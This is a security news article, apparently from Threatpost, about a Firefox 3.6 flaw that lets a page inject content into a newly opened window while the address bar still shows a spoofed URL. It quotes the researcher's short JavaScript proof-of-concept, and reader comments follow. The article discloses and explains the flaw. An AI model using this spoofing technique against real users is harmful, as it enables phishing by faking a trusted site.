New Firefox Flaw Enables URL Spoofing, Code Injection

A prominent security researcher has identified a problem with the way that Mozilla Firefox handles links that are opened in a new browser window or tab, enabling attackers to inject arbitrary code into the new window or tab while still keeping a deceptive URL in the browser’s address bar.

A prominent security researcher has identified a problem with the way that Mozilla Firefox handles links that are opened in a new browser window or tab, enabling attackers to inject arbitrary code into the new window or tab while still keeping a deceptive URL in the browser’s address bar.

The vulnerability, which Mozilla has fixed in the upcoming version 3.6.4 of Firefox, has the effect of tricking users into thinking that they’re visiting a legitimate site while instead sending arbitrary attacker-controlled code to their browsers. Security researcher Michal Zalewski discovered the flaw. There have been a number of other address-bar spoofing vulnerabilities reported in recent years, as researchers and attackers have focused their attention on the intricacies of the browsers’ interactions with Web sites.

Firefox 3.6.4 is currently in beta.

Zalewski has been detailing a series of interesting browser bugs that he’s discovered in recent blog posts, and the Firefox bug is the latest. Here’s his description of how it works:

Alas, this design decision creates an interesting vulnerability in
Firefox: the about:blank document actually displayed in
that window while the page is loading is considered to be same
origin
with the opener; the attacker can inject any content there –
and still keep his made up URL in the address bar.

Well, the spinning throbber is there, right? As it turns out, you can make it go away. The harder way is to use an URL that legitimately returns HTTP 204; the easier way is to simply call window.stop():

<input type=submit value=”Click me!” onclick=”clicked()”>
<script>
var w;
function clicked() {
  w = window.open(“http://1.2.3.4/”, “_blank”, “toolbar=1,menubar=1”);
  setTimeout(‘w.document.body.innerHTML = “Fake content!”;w.stop();’, 500);
}
</script>

Zalewski also has discovered and reported other browser bugs in recent months, including one in Apple’s Safari browser. That vulnerability in Safari allowed different pages from different domains to access each other at any time.

Suggested articles

Discussion

  • Anonymous on

    I have been using Firefox as browser for about a month now.  I SURE HOPE that Kaspersky is protecting my computer against these "bugs".  I would appreciate any reasurrance.

  • Parag Arora on

    This is a cross domain window control. I so want to see Zalewski's test cases now.

  • An Undying Loyal Firefox Fan on

    Thank God Firefox Is always open to constructive advancement and comprehensive analysis...!!! You GO.!!!!  Kaspersky...!!!!

  • Anonymous on

    For over a week now, I've been getting notices, alleged from Mozilla, Firefox OR SOMEONE ANYWAY, claiming that I should allow a 3rd option, where the foreign code will control the option.  BURGLAR -- Ms [1] please just let me in and [2] if you don't like #1, then go to #3 AND [3] says let ANY BURGLAR ++++ CONTROL +++++ ACCESS.

  • Anonymous on

    This isn't something kaspersky can help you with.  More than likely, an attacker would perform a MITM on you and capture traffic as its going by.  Then, they would alter the http resonse packets to include their code.  To the browser and your machine, everything will always appear to be fine because it will just assume the server sent them this information.  The only thing that can help you is yourself.  Surf intelligently and realise when things happen that shouldn't.

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.